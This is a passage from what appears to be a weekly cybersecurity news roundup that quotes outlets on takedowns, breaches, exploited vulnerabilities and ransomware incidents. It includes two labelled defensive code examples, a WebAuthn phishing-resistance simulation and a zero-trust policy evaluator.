    • “The resolution agreement and corrective action plan may be found at https://www.hhs.gov/sites/default/files/ocr-mmg-fusion-hipaa-agreement.pdf [PDF, 264 KB].”
  • Cybersecurity Dive informs us,
    • “An international coalition led by Microsoft and Europol has taken down the operations of Tycoon 2FA, a notorious phishing-as-a-service platform that helped cyber criminals gain access to millions of email accounts across the globe. 
    • “Microsoft obtained a court order from the U.S. District Court from the Southern District of New York to seize 330 active domains used to back the core infrastructure of Tycoon 2FA.
    • “Taking this infrastructure offline cuts off a major pipeline for account takeovers and helps protect people and organizations from follow-on attacks such as data theft, ransomware, business email compromise and financial fraud,” Steve Masada, assistant general counsel at Microsoft’s Digital Crimes Unit, said in a blog post published Wednesday.”
  • Bleeping Computer lets us know,
    • “The FBI has seized the LeakBase cybercrime forum, a major online forum used by cybercriminals to buy and sell hacking tools and stolen data.
    • “This seizure action is part of an international joint operation coordinated by Europol, known as “Operation Leak,” that involved law enforcement agencies in 14 countries.
    • “On March 3 and 4, the FBI and law enforcement agents shut down LeakBase by seizing two of its domains, posting seizure banners, and warning LeakBase members of the seizure after collecting further evidence.” * * *
    • “Today’s [March 4] announcement follows the disruption of RaidForums in 2022 and BreachForums in 2023, two cybercrime marketplaces that preceded it, as well as the BreachForums founder’s conviction and sentencing in 2025.”
  • and
    • “A U.S. government contractor’s son, accused of stealing more than $46 million in cryptocurrency from the U.S. Marshals Service, was arrested Wednesday on the island of Saint Martin.
    • “The arrest was the result of a joint operation between the FBI and France’s elite Groupe d’Intervention de la Gendarmerie Nationale, FBI Director Kash Patel announced on Thursday.
    • “Last night, John Daghita – a U.S. government contractor who allegedly stole more than $46 million in cryptocurrency from the U.S. Marshals Service – was arrested on the island of Saint Martin by the French Gendarmerie’s premier elite tactical unit in a joint operation with the @FBI,” Patel said.”
  • Cyberscoop points out,
    • “Russian national Evgenii Ptitsyn pleaded guilty to running the Phobos ransomware outfit that extorted more than $39 million from more than 1,000 victims globally, the Justice Department said Wednesday.
    • “Ptitsyn assumed a leadership role in the Phobos ransomware group in January 2022, yet his criminal activities began by April 2019, according to court records. He continued leading the cybercrime syndicate until May 2024 when he was arrested in South Korea. Ptitsyn was extradited to the United States in November 2025.
    • “Federal prosecutors dropped multiple charges against Ptitsyn as part of a plea agreement he signed last month. He faces up to 20 years in prison for wire fraud conspiracy.
    • “Ptitsyn agreed to forfeit $1.77 million in assets and is required to pay at least $39.3 million in restitution, representing the full amount of his victims’ losses.”

From the cybersecurity breaches and vulnerabilities front,

  • The Wall Street Journal reports on March 6,
    • “U.S. investigators believe hackers affiliated with the Chinese government are responsible for a cyber intrusion on an internal Federal Bureau of Investigation computer network that holds information related to some domestic surveillance orders, according to people familiar with the matter.
    • “The scope and severity of the intrusion aren’t known, and the investigation is in its early stages, the people said. Any preliminary conclusions could change as investigators gather more information. 
    • “If China is confirmed to be responsible for the breach, it would signal the latest intrusion by Beijing’s hackers of computer systems related to law-enforcement surveillance orders, which contain highly sensitive material.
    • “A notification sent in recent days to some lawmakers in Congress said the FBI began investigating the matter last month, the people said. The intrusion involved hackers accessing an unclassified system that contains information about the calls and internet activity of criminal suspects and others under government surveillance. Information in the system includes incoming and outgoing calls, IP and website addresses and some routing information, but doesn’t include the contents of calls or digital communication.” 
  • Cybersecurity Dive adds,
    • “A total of 90 zero-day vulnerabilities were exploited in the wild in 2025, according to a report released Thursday by Google Threat Intelligence Group.
    • “Of that total, almost half of the exploited vulnerabilities were used against enterprise-grade technology, marking an all-time high. 
    • “Exploitation from state-sponsored groups targeted networking and security tools with a strong emphasis on edge devices, which often lack endpoint detection and response capabilities, according to GTIG researchers. 
    • “China-nexus groups remain the most prolific state-sponsored groups, with a long history of detailed knowledge of vulnerable devices. 
    • “They have a significant zero-day development ecosystem that includes industry, academia, and government,” John Hultquist, chief analyst at GTIG, told Cybersecurity Dive.”
  • Bleeping Computer relates,
    • “TriZetto Provider Solutions, a healthcare IT company that develops software and services used by health insurers and healthcare providers, has suffered a data breach that exposed the sensitive information of over 3.4 million people.
    • “The firm, which has been operating under the Cognizant umbrella since 2014, disclosed that it detected suspicious activity on a web portal on October 2, 2025, and launched an investigation with the help of external cybersecurity experts.
    • “The investigation revealed that unauthorized access began nearly a year before, on November 19, 2024.” * * *
    • “Affected providers were alerted on December 9, 2025, but customer notification started in early February 2026. According to a filing Maine’s Attorney General submitted today [March 6], the number of exposed individuals is 3,433,965.
    • “TriZetto says that payment card, bank account, or other financial information was not exposed in this incident. Also, the company is not aware of any cases where cybercriminals have attempted to misuse this information.”
  • CISA added seven known exploited vulnerabilities to its catalog this week.
    • March 3, 2026
      • CVE-2026-21385 Qualcomm Multiple Chipsets Memory Corruption Vulnerability
      • CVE-2026-22719 Broadcom VMware Aria Operations Command Injection Vulnerability
        • Cybersecurity News discusses the Qualcomm KEV here.
        • Bleeping Computer discusses the VMware Aria KEV here.
    • March 5, 2026
      • CVE-2017-7921 Hikvision Multiple Products Improper Authentication Vulnerability
      • CVE-2021-22681 Rockwell Multiple Products Insufficient Protected Credentials Vulnerability
      • CVE-2021-30952 Apple Multiple Products Integer Overflow or Wraparound Vulnerability
      • CVE-2023-41974 Apple iOS and iPadOS Use-After-Free Vulnerability
      • CVE-2023-43000 Apple Multiple Products Use-After-Free Vulnerability
        • The Hacker News discusses the Hikvision and Rockwell KEVs here.
        • Bleeping Computer discusses the Apple KEVs here.
  • Cyberscoop adds,
    • “Cisco released information on a pair of max-severity vulnerabilities in its firewall management software Wednesday that unauthenticated, remote attackers could exploit to obtain the highest level of access to the underlying operating system or on affected devices.
    • “The vulnerabilities — CVE-2026-20079 and CVE-2026-20131 — affect the web-based interface of Cisco Secure Firewall Management Center (FMC) Software, regardless of device configuration, the vendor said.
    • “Cisco disclosed the critical vulnerabilities one week after it warned that attackers have been exploiting a pair of zero-days in Cisco’s network edge software for at least three years. That campaign, which is ongoing, marked the second series of multiple actively exploited zero-days in Cisco edge technology since last spring. 
    • “Both campaigns prompted the Cybersecurity and Infrastructure Security Agency to issue emergency directives months after the attacks were first detected, and both attack sprees were underway for at least a year before they were discovered.” 
  • and
    • “Google disclosed one actively exploited zero-day vulnerability Monday, warning that the high-severity defect affecting an open-source Qualcomm display component for Android devices “may be under limited, targeted exploitation.”
    • “The memory-corruption vulnerability — CVE-2026-21385 — which Google’s Android security team reported to Qualcomm Dec. 18, affects 234 chipsets, Qualcomm said in a security bulletin. Qualcomm said it notified customers of the vulnerability Feb. 2.
    • “Qualcomm declined to say when the earliest known instance of exploitation occurred, how many victims have been directly impacted, and what occurred during the 10-week period between the reporting and public disclosure of the vulnerability. 
    • “We commend the researchers from Google’s Threat Analysis Group for using coordinated disclosure practices,” a Qualcomm spokesperson told CyberScoop. “Fixes were made available to our customers in January 2026. We encourage end users to apply security updates as they become available from device makers.”
  • and
    • “North Korean threat groups are using artificial intelligence tools to accelerate and expand the country’s long-running scheme to get remote technical workers hired at global companies for longer durations, Microsoft Threat Intelligence said in a report Friday. 
    • “AI services are empowering North Korean operatives across the attack lifecycle. Attackers have turned AI into a “force multiplier” that bolsters and automates their efforts to conduct research on targets, develop malicious resources, achieve and maintain access, evade detection, and weaponize tools for attacks and post-compromise activities, researchers said.
    • “Microsoft said a trio of groups it tracks as Coral Sleet, Sapphire Sleet and Jasper Sleet are using AI to shorten the time it takes to create digital personas for specific job markets and roles. These groups frequently leverage financial opportunities or interview-themed lures to gain initial access.”
  • The Hacker News notes,
    • “Cybersecurity researchers have disclosed details of a new phishing suite called Starkiller that proxies legitimate login pages to bypass multi-factor authentication (MFA) protections.
    • “It’s advertised as a cybercrime platform by a threat group calling itself Jinkusu, granting customers access to a dashboard that lets them select a brand to impersonate or enter a brand’s real URL. It also lets users choose custom keywords like “login,” “verify,” “security,” or “account,” and integrates URL shorteners such as TinyURL to obscure the destination URL.
    • “It launches a headless Chrome instance – a browser that operates without a visible window – inside a Docker container, loads the brand’s real website, and acts as a reverse proxy between the target and the legitimate site,” Abnormal researchers Callie Baron and Piotr Wojtyla said.”
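The Starkiller write-up above describes a reverse proxy that sits between the victim and the genuine login page and relays whatever the victim types, one-time codes included. The reason a proxied login still fails against a phishing-resistant factor is that a WebAuthn assertion carries the origin the browser actually loaded and a hash of the relying-party domain, and the relying party rejects anything signed for a different site. The following simulation is an added example, not code from Abnormal or from The Hacker News; the relying-party domain, the look-alike host (a `.invalid` name) and the authenticator key are constructed, and an HMAC stands in for the authenticator's public-key signature so the block runs on the standard library alone.

```python
import base64
import hashlib
import hmac
import json

# Constructed relying party (RP) and authenticator key for the simulation; no real service.
RP_ID = "login.example.com"
ALLOWED_ORIGINS = {"https://login.example.com"}
AUTHENTICATOR_KEY = b"constructed-authenticator-key"  # stand-in for the credential's private key


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def authenticator_sign(client_data_json: bytes, authenticator_data: bytes) -> bytes:
    # WebAuthn authenticators sign authenticatorData || SHA-256(clientDataJSON) with an
    # asymmetric key. HMAC stands in for that signature so the example runs on the stdlib.
    msg = authenticator_data + hashlib.sha256(client_data_json).digest()
    return hmac.new(AUTHENTICATOR_KEY, msg, hashlib.sha256).digest()


def browser_get_assertion(origin_loaded: str, challenge: bytes) -> dict:
    """Simulates what the browser assembles when the page it loaded from `origin_loaded`
    calls navigator.credentials.get(). The origin field and the rpIdHash come from the
    page the browser actually loaded; the page's own script cannot point them at another site."""
    client_data_json = json.dumps(
        {"type": "webauthn.get", "challenge": b64url(challenge), "origin": origin_loaded},
        separators=(",", ":"),
    ).encode()
    effective_domain = origin_loaded.split("://", 1)[1].split("/", 1)[0]
    # authenticatorData = rpIdHash (32 bytes) || flags (UP|UV) || signature counter
    authenticator_data = hashlib.sha256(effective_domain.encode()).digest() + b"\x05" + (0).to_bytes(4, "big")
    return {
        "clientDataJSON": client_data_json,
        "authenticatorData": authenticator_data,
        "signature": authenticator_sign(client_data_json, authenticator_data),
    }


def rp_verify(assertion: dict, expected_challenge: bytes) -> tuple:
    """Relying-party checks from the WebAuthn assertion verification procedure, in order.
    Returns (accepted, reason)."""
    client_data = json.loads(assertion["clientDataJSON"])
    if client_data.get("type") != "webauthn.get":
        return False, "wrong ceremony type"
    if client_data.get("challenge") != b64url(expected_challenge):
        return False, "challenge mismatch (replayed or stale assertion)"
    if client_data.get("origin") not in ALLOWED_ORIGINS:
        return False, f"origin {client_data.get('origin')!r} is not the relying party"
    authenticator_data = assertion["authenticatorData"]
    if authenticator_data[:32] != hashlib.sha256(RP_ID.encode()).digest():
        return False, "rpIdHash does not match the relying party"
    expected_sig = authenticator_sign(assertion["clientDataJSON"], authenticator_data)
    if not hmac.compare_digest(assertion["signature"], expected_sig):
        return False, "signature does not verify"
    return True, "accepted"


def otp_verify(expected_code: str, submitted_code: str) -> bool:
    # A one-time code carries no statement about where the user typed it, so a site that
    # relays the code verbatim is indistinguishable from the real user at the real site.
    return hmac.compare_digest(expected_code, submitted_code)


if __name__ == "__main__":
    challenge = b"\x11" * 32  # constructed; a real RP draws a fresh random challenge per login
    print(rp_verify(browser_get_assertion("https://login.example.com", challenge), challenge))
    # Page served by a constructed look-alike host that proxies the real site:
    print(rp_verify(browser_get_assertion("https://login-example.invalid", challenge), challenge))
```

The contrast is in the last two functions: `otp_verify` compares two strings and nothing else, so a relayed code passes, while `rp_verify` fails a proxied login at the origin check before the signature is even examined. The same structure is what makes the enforcement checkable in logs: a failed assertion with an unexpected `origin` value is a concrete detection signal for this class of kit.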

From the ransomware front,

  • The Record reports,
    • “The University of Hawaiʻi Cancer Center said up to 1.2 million people had information leaked as a result of a ransomware attack on its epidemiology division last year. 
    • “Hackers accessed records containing Social Security numbers (SSNs) and driver’s license numbers collected from the Hawaiʻi State Department of Transportation as well as City and County of Honolulu voter registration records from 1998, according to a statement released by the organization last week.” * * *
    • “In January, the university sent a report to the state legislature that said the cyber incident was first discovered on August 31, 2025.” * * *
    • “Naoto Ueno, director of the University of Hawaiʻi Cancer Center, apologized for the incident last week and said the organization was “committed to transparency.” 
    • “The university said the attackers encrypted and likely exfiltrated data, prompting them to notify law enforcement and hire cybersecurity experts to resolve the situation. The cybersecurity firm obtained a decryption tool and secured “an affirmation that any information obtained was destroyed.”  
    • “University officials claimed there is “no evidence that any of the information has been published, shared or misused.” The group responsible for the attack was not identified.”   
  • Cybersecurity Dive relates,
    • “Identity has replaced malware as the biggest threat vector opening the door for ransomware attacks, Cloudflare said in an annual threat report published on Tuesday.
    • “Hackers’ increasing use of legitimate credentials, rather than malicious code, is making it harder for defenders to detect and contain their attacks.
    • “Cloudflare’s new report also discussed nation-state threat actors’ behavior and how artificial intelligence is changing attacks.”
  • Mobihealth News interviews Scott Doerr, virtual CISO, or vCISO, at Fortified Health Security, [who] previews his upcoming talk at the 2026 HIMSS Global Health Conference & Exposition, where he will discuss how healthcare companies can strengthen their preparedness for ransomware attacks. 

From the cybersecurity business and defenses front,

  • Cyberscoop reports,
    • “CrowdStrike Holdings reported record earnings in the fiscal fourth-quarter, defying investor concerns about the rising use of agentic AI potentially curbing demand for cybersecurity software and services. 
    • “The Texas-based cybersecurity company said total revenue grew 23% on a year-over-year basis, to $1.31 billion in the quarter ended Jan. 31. 
    • “Annual recurring revenue, a closely watched metric among cybersecurity companies, grew 24%, to $5.25 billion. 
    • “The results come at a time of growing market anxiety about how AI adoption could render traditional software — including cybersecurity tools — obsolete. CrowdStrike executives acknowledged those larger industry concerns and noted the Q4 performance was a demonstration that certain companies were well-positioned to compete in the new marketplace.” 
  • ZDNet adds,
    • “Anthropic, OpenAI, and Google tools can automate code debugging. 
    • “But cybersecurity is too complex a problem for these tools to solve. 
    • “AI’s biggest contribution may be to reduce avoidable software flaws. 
  • Healthexec relates,
    • “In January, the National Security Agency (NSA) released protocols for the U.S. Department of War to achieve “zero trust” security across the agency, meaning any access to the network must come from something continually inside it. While such a setup would be technically demanding for healthcare, the American Hospital Association (AHA) said it may be time for facilities to start moving in that direction.
    • “Zero trust security would mean radical changes for hospitals, where a countless number of devices have access to networks, including everything from EHRs to medical devices, to tablets and smartphones used for communication.
    • “What the NSA wants the Department of War to adopt is a system where no one gains access to a network from the outside, meaning no logins or passwords. In fact, even systems connected to the network from the inside are not automatically trusted.
    • “In other words, every user, device, and system must continually prove they are allowed access—and access is limited strictly to what’s necessary.
    • “The ethos of zero trust means that it’s assumed even the network itself isn’t safe, hence the continuous verification. Something like a two-factor authentication app displaying a constant active code would be required to log on.”
  • The AHA News adds,
  • SC World tells us,
    • “The 2026 Zero Trust World conference kicked off here Wednesday (March 4) with a particularly optimistic keynote by futurist and TV host Jason Silva and also featured a last-minute addition in the form of a talk by former White House CIO Theresa Payton.
    • “But it was the smaller sessions, including a dark-web primer and a live Security Now! podcast broadcast featuring cybersecurity veterans Steve Gibson and Leo LaPorte, that stole the show during the first day of ThreatLocker’s annual user conference.”
  • Tech Target explains “how to perform a data risk assessment, step by step.”
  • Here’s a link to Dark Reading’s CISO Corner.
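The Healthexec item above describes zero trust in prose: every user, device and system proves itself on every request, access is limited to what is necessary, and being inside the network earns no credit. The policy evaluator below is an added example, not the NSA's protocols or anything from the AHA or Healthexec; it shows what those three rules look like as a per-request decision in a hospital-style setting. The roles, resources, MFA window, patch threshold and the sample requests are all constructed.

```python
from dataclasses import dataclass, field
from datetime import datetime, timedelta, timezone
from typing import Optional

# Constructed policy values; a real deployment tunes these per resource sensitivity.
MFA_MAX_AGE = timedelta(minutes=15)
PATCH_MAX_AGE_DAYS = 30

# Least-privilege grants, role -> resource -> allowed actions (constructed sample).
ROLE_GRANTS = {
    "clinician": {"ehr": {"read", "write"}},
    "facilities": {"hvac": {"read", "write"}, "building-automation": {"read", "write"}},
    "hvac-vendor": {"hvac": {"read"}},
}


@dataclass
class Subject:
    user: str
    roles: set
    mfa_verified_at: Optional[datetime]  # last strong authentication in this session


@dataclass
class Device:
    device_id: str
    managed: bool
    edr_running: bool
    days_since_patch: int


@dataclass
class Request:
    subject: Subject
    device: Device
    resource: str
    action: str
    source_network: str  # "internal" or "internet"; recorded, never used as a trust signal
    now: datetime


@dataclass
class Decision:
    allow: bool
    reasons: list = field(default_factory=list)


def evaluate(req: Request) -> Decision:
    """Evaluate one access request. Every request is checked; nothing is inherited from
    an earlier decision or from being 'inside' the network."""
    s, d = req.subject, req.device
    reasons = []
    # 1. Identity: recent strong authentication is required on every request.
    if s.mfa_verified_at is None or req.now - s.mfa_verified_at > MFA_MAX_AGE:
        reasons.append("re-authentication required: MFA missing or older than the window")
    # 2. Device posture: managed, monitored and patched, whatever the user's role.
    if not d.managed:
        reasons.append(f"device {d.device_id} is not managed")
    if not d.edr_running:
        reasons.append(f"device {d.device_id} has no running endpoint agent")
    if d.days_since_patch > PATCH_MAX_AGE_DAYS:
        reasons.append(f"device {d.device_id} is {d.days_since_patch} days behind the patch baseline")
    # 3. Least privilege: the action must be explicitly granted to one of the subject's roles.
    granted = any(req.action in ROLE_GRANTS.get(role, {}).get(req.resource, set()) for role in s.roles)
    if not granted:
        reasons.append(f"no role of {s.user} grants {req.action} on {req.resource}")
    allow = not reasons
    if not allow and req.source_network == "internal":
        reasons.append("internal network location does not override the checks above")
    return Decision(allow=allow, reasons=reasons)


NOW = datetime(2026, 3, 7, 9, 0, tzinfo=timezone.utc)  # constructed clock for the samples


def sample_requests() -> dict:
    """Constructed hospital-style requests illustrating each policy outcome."""
    managed_tablet = Device("tablet-01", managed=True, edr_running=True, days_since_patch=3)
    personal_phone = Device("byod-07", managed=False, edr_running=False, days_since_patch=90)
    nurse = Subject("nurse1", {"clinician"}, NOW - timedelta(minutes=5))
    nurse_stale = Subject("nurse1", {"clinician"}, NOW - timedelta(hours=2))
    engineer = Subject("eng2", {"facilities"}, NOW - timedelta(minutes=1))
    return {
        "nurse_reads_ehr_from_internet": Request(nurse, managed_tablet, "ehr", "read", "internet", NOW),
        "nurse_reads_ehr_from_byod_inside": Request(nurse, personal_phone, "ehr", "read", "internal", NOW),
        "nurse_with_stale_mfa": Request(nurse_stale, managed_tablet, "ehr", "read", "internet", NOW),
        "nurse_writes_hvac_inside": Request(nurse, managed_tablet, "hvac", "write", "internal", NOW),
        "engineer_writes_hvac": Request(engineer, managed_tablet, "hvac", "write", "internal", NOW),
    }


if __name__ == "__main__":
    for name, req in sample_requests().items():
        print(name, evaluate(req))
```

The point of the sample set is the second and fourth cases: a request from inside the building on a personal phone, and a clinician trying to write to the HVAC controller, are both denied even though neither would have been stopped by a perimeter firewall. The reasons list is what an operations team would log and review, since a zero-trust rollout in a hospital is mostly an exercise in discovering which devices and workflows fail these checks before enforcement is switched on.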

Cybersecurity Saturday

From the cybersecurity policy and law enforcement front,

  • Cybersecurity Dive reports,
    • “The Trump administration late Thursday removed the scandal-plagued acting director of the Cybersecurity and Infrastructure Security Agency, injecting fresh uncertainty into the operations of an agency already grappling with a morale crisis as it tries to protect the U.S. from sophisticated hacking threats.
    • “The Department of Homeland Security reassigned Madhu Gottumukkala, the deputy CISA director who had led the agency in an acting capacity since last May, to a position at DHS headquarters. Nick Andersen, the executive assistant director for CISA’s Cybersecurity Division and one of the few remaining political appointees at the agency, will step in as acting director.”
  • Federal News Network adds,
    • “Sen. Ron Wyden (D-Ore.) is blocking the Trump administration’s nominee to lead both U.S. Cyber Command and the National Security Agency. Wyden said Lt. Gen. Joshua Rudd, who currently serves as the deputy commander of U.S. Indo-Pacific Command, lacks the experience needed to immediately step into the dual leadership role. The lawmaker added that when it comes to U.S. cybersecurity, “there is simply no time for on-the-job learning, the threat is just too urgent for that.”
  • Gov Info Security relates,
    • “A bipartisan group of senators called on the federal government to update the regulations governing healthcare cybersecurity through a Thursday vote sending a bill aimed at bolstering sector resilience to the full Senate.
    • “The Senate Health, Education, Labor and Pensions Committee voted 22 to 1 to advance the Health Care Cybersecurity and Resiliency Act, a bill that requires publishing cybersecurity guidance for rural medical practices and improved coordination between federal agencies.
    • “It has the backing of a healthcare cybersecurity working group that includes committee Chair Bill Cassidy, R-La.
    • “The legislation would additionally bolster an apparently stalled effort to update the HIPAA Security Rule that the Department of Health and Human Services published during the final weeks of the Biden administration (see: What’s in HHS’ Proposed HIPAA Security Rule Overhaul?).
    • “The bill would enforce many of the proposed rule’s updates, including requiring HIPAA-covered organizations and business associates to adopt multifactor authentication and encryption, to conduct audits, including penetration testing. It additionally calls for “other minimum cybersecurity standards” to be determined by the HHS secretary, “in consultation with private sector organizations, based on landscape analysis of emerging and existing cybersecurity vulnerabilities and consensus-based best practices.”
    • “The fate of the Biden administration’s proposed HIPAA overhaul is uncertain at this point. The HHS Office of Civil Rights is expected to make some kind of decision in May on whether it will move forward with the proposals, or perhaps issue a revised version of proposed rulemaking.”
  • Cyberscoop notes,
    • “An ex-L3Harris executive was sentenced to over seven years in prison Tuesday after pleading guilty to selling eight zero-day exploits to a Russian broker in exchange for millions of dollars.
    • “Peter Williams, 39, admitted to two counts of theft of trade secrets in U.S. District Court in Washington, D.C., last year, acknowledging he took at least eight exploits or exploit components while working at Trenchant, a specialized cybersecurity unit owned by L3Harris. Prosecutors said the materials were intended for restricted use by the U.S. government and allied partners.
    • “Authorities said Williams sold the stolen information to a broker that advertised itself as a reseller of hacking tools and described it as serving multiple customers, including the Russian government. In court, the government referred to the buyer as “Company 3,” but details read aloud during the plea hearing pointed to Operation Zero, a Russian exploit broker that publicly markets itself online as a platform for purchasing zero-day vulnerabilities.”

From the cybersecurity breaches and vulnerabilities front,

  • Cybersecurity Dive reports,
    • “Federal agencies have until Friday evening [February 27] to update certain Cisco networking devices that are vulnerable to compromise, the Cybersecurity and Infrastructure Security Agency said on Tuesday [February 24].
    • “In an emergency directive about Cisco’s Software-Defined Wide-Area Networking (SD-WAN) systems, CISA said it was “aware of a cyber threat actor’s ongoing exploitation” of two vulnerabilities in Cisco Catalyst SD-WAN Manager and Catalyst SD-WAN Controller devices and called the activity “an imminent threat to federal networks.”
  • and
    • “The Cybersecurity and Infrastructure Security Agency on Thursday warned that a malware variant previously used in attacks against Ivanti Connect Secure environments may remain undetected on systems. 
    • “In March 2025, CISA issued an alert about the malware, dubbed Resurge, in connection with exploitation of CVE-2025-0282, a stack-based buffer overflow vulnerability in certain versions of Ivanti Connect Secure and other Ivanti products. 
    • “The agency has since analyzed three samples from a critical infrastructure provider’s Ivanti Connect Secure device after hackers exploited the flaw to gain initial access. The analysis shows that Resurge can remain latent on a device until a remote hacker attempts to contact the device.” 
  • Cyberscoop adds,
    • “Would-be attackers spent 2025 swimming in a sea of more than 40,000 newly published vulnerabilities, VulnCheck said in a report released Wednesday, but only 1% of those defects, just 422, were exploited in the wild.
    • “As the deluge of vulnerabilities grows every year, and CVSS ratings lose significance for vulnerability management prioritization, some defenders are turning to research on known exploited vulnerabilities to narrow their scope of work and place more emphasis on verified risks. 
    • “The growth in CVE volume is ludicrous, not necessarily unfounded, but it’s large. Defenders don’t know what to pay attention to,” Caitlin Condon, vice president of security research at VulnCheck, told CyberScoop. “Prioritization is still a huge problem.”
    • “Too many defenders and researchers are paying attention to defects and unsubstantiated exploit concepts that aren’t worth their time, Condon added. “The indicators of risk that used to be semi reliable, now no longer are.”
  • and
    • “Cyberattacks reached victims faster and came from a wider range of threat groups than ever last year, CrowdStrike said in its annual global threat report released Tuesday, adding that cybercriminals and nation-states increasingly relied on predictable tactics to evade detection by exploiting trusted systems.
    • “The average breakout time — how long it took financially-motivated attackers to move from initial intrusion to other network systems — dropped to 29 minutes in 2025, a 65% increase in speed from the year prior. “The fastest breakout time a year ago was 51 seconds. This year it’s 27 seconds,” Adam Meyers, head of counter adversary operations at CrowdStrike, told CyberScoop.
    • “Defenders are falling behind because attackers are refining their techniques, using social engineering to access high-privilege systems faster and move through victims’ cloud infrastructure undetected.”
  • Cybersecurity Dive points out,
    • “Hackers are increasingly integrating artificial intelligence into all phases of the cyberattack life cycle, with the technology regularly analyzing target information, generating phishing emails and providing coding assistance, security firm ReliaQuest said in a report published on Tuesday [February 24].
    • “Other recent reports from IBM and cyber insurer Resilience similarly highlight how AI has changed the threat landscape.
    • “At the same time, a new Sophos report said it was important to put in perspective AI’s ‘capabilities and impact.’”
  • LinkedIn informs us,
    • “One of the largest data breaches in U.S. history is even bigger than was known. The Conduent cyberattack has now affected more than 25 million Americans, according to a recent update. The January 2025 incident exposed Social Security numbers, medical records and other sensitive information. Conduent is one of the largest contractors for the U.S. government, providing mailroom, printing and payment processing services for state government benefit offices — meaning it manages “a large amount of personal information belonging to a large swath of the United States,” per TechCrunch.”
  • Cybersecurity Dive adds,
    • “Hackers working for the Chinese government broke into more than 50 telecommunications companies and government agencies in 42 countries, in a campaign that exploited cloud platforms’ legitimate features to hide the attackers’ tracks.
    • “The attacker was using API calls to communicate with [software-as-a-service] apps as command-and-control (C2) infrastructure to disguise their malicious traffic as benign,” researchers at Google’s Threat Intelligence Group and Mandiant said in a report on Wednesday.
    • “Google said the “prolific, elusive” China-linked hacker team, which it tracks as UNC2814, “has a long history of targeting international governments and global telecommunications organizations across Africa, Asia, and the Americas.”

From the ransomware front,

  • The Mississippi Clarion Ledger reports,
    • “Officials with the University of Mississippi Medical Center stated the hospital system is “getting closer to full functions” following a cyberattack on Feb. 19 that disrupted operations.
    • “UMMC issued a statement Friday, Feb. 27, stating after being able to access patient records, clinics statewide will resume normal operations and scheduled appointments on Monday, March 2.
    • “UMMC also stated that on March 2, clinics will begin reaching out to patients to reschedule appointments that were cancelled. Officials added that UMMC clinics will reopen with extended hours and additional days in order to accommodate patients as soon as possible.
    • “All hospitals and emergency departments located in Jackson, Madison County, Holmes County and Grenada remain open.”
  • Cybersecurity Dive relates,
    • “UFP Technologies, a Massachusetts-based medical device maker, said it is investigating a cyberattack in mid-February that led to some of its company data being stolen or potentially destroyed, according to a regulatory filing
    • “The company said the attack, which was detected Feb. 14, impacted most of its IT network, as well as its billing and label-making capabilities for customer deliveries. The company said it was able to continue operations using data backups and implementing contingency plans.
    • “This was a classic ransomware attack that appeared to have impacted many, but not all, of our IT systems,” Ronald Lataille, chief financial officer at UFP Technologies, said Wednesday on a quarterly conference call with analysts. “Data was taken and then destroyed.”
    • “The company is still trying to figure out how much sensitive information, including personally identifiable data, may have been impacted by the attack, according to the 8-K filing with the Securities and Exchange Commission. However, the company does not currently believe the attack will have a material impact on its financial condition.”
  • The Hacker News adds,
    • “The North Korea-linked Lazarus Group (aka Diamond Sleet and Pompilus) has been observed using Medusa ransomware in an attack targeting an unnamed entity in the Middle East, according to a new report by the Symantec and Carbon Black Threat Hunter Team.
    • “Broadcom’s threat intelligence division said it also identified the same threat actors mounting an unsuccessful attack against a healthcare organization in the U.S. Medusa is a ransomware-as-a-service (RaaS) operation launched by a cybercrime group known as Spearwing in 2023. The group has claimed more than 366 attacks to date.
    • “Analysis of the Medusa leak site reveals attacks against four healthcare and non-profit organizations in the U.S. since the beginning of November 2025,” the company said in a report shared with The Hacker News.”
  • The Register informs us,
    • “Ransomware payments cratered in 2025, but it seems like the cybercrooks launching the attacks didn’t get the memo.
    • “That’s the headline from Chainalysis’ 2026 Crypto Crime Report, which shows total on-chain ransomware payments falling for a second straight year, even as victim counts and leak site pressure continue to climb.
    • “Ransomware gangs pulled in about $820 million in 2025, roughly 8 percent less than the year before, as the share of victims paying dropped to an all-time low of 28 percent. That drop might sound like progress if the wider picture weren’t so bleak: the median ransom demand jumped from $12,738 in 2024 to $59,556 in 2025, and the number of publicly claimed attacks climbed along with it.
    • “Despite the relative stability in total payments, ransomware attacks surged across multiple vectors in 2025, with eCrime.ch data showing a 50 percent YoY increase in claimed ransomware victims, marking the most active year on record,” Chainalysis said.”
  • Help Net Security adds,
    • “Intrusions continue to center on credential access and timed execution outside standard business hours. The Sophos Active Adversary Report 2026 analyzes 661 incident response and managed detection and response cases handled between November 1, 2024 and October 31, 2025, spanning organizations in 70 countries.
    • “The dataset examines how attackers gain access, how quickly they reach key systems, and when ransomware and data theft occur.” * * *
    • “Timing patterns show that the most disruptive stages of ransomware incidents often occur when organizations are operating with reduced staffing. In 88% of ransomware cases, encryption was deployed during non business hours.
    • “Data exfiltration followed a similar pattern, with 79% of theft activity also occurring outside the typical workday.
    • “Off hours deployment increases the likelihood that encryption or large scale data transfers proceed without immediate interruption. It places emphasis on monitoring coverage that extends beyond standard schedules.”

From the cybersecurity business and defenses front,

  • Dark Reading reports,
    • “The cybersecurity venture capital market experienced unprecedented activity in 2025, driven primarily by the rush to AI-native security solutions and a massive surge in mergers and acquisitions that reached record levels.
    • “In 2025, VC firms invested $119 billion in cybersecurity businesses, with 400 M&A transactions accounting for the majority of funding and another 820 financing deals totaling nearly $21 billion, according to data from Momentum Cyber, a cybersecurity investment bank. The total value of M&A, financing, and IPO activity in 2025 nearly tripled that of deals in the previous year.”
  • and
    • “Cybersecurity experts are calling for a major shift in how companies handle data breaches and security failures, arguing that greater transparency and specific detail disclosure about how and why they occur is essential if the industry hopes to effectively reduce cyber-risk.
    • “At the upcoming RSAC Conference, threat research experts Adam Shostack and Adrian Sanabria will make the case for greater incident transparency and the need for structured feedback loops in cybersecurity, in a session aptly titled “A Failure Is a Terrible Thing to Waste: The Case for Breach Transparency,”scheduled for Monday, March 23.”
  • Cybersecurity Dive informs us,
    • “The AI era is transforming what CISOs do and how they do it, the enterprise software firm Splunk said in a report published on Tuesday [February 24].
    • “Nearly all CISOs have been assigned to manage their organizations’ AI governance responsibilities, the report found, a significant expansion of “their already overwhelming mandates.”
    • CISOs interviewed in the report expressed both an awareness that they needed to use AI and a range of concerns about its potential harms.”
  • Dark Reading relates,
    • “As one ransomware community shutters in RAMP, two more pop up to take its place. 
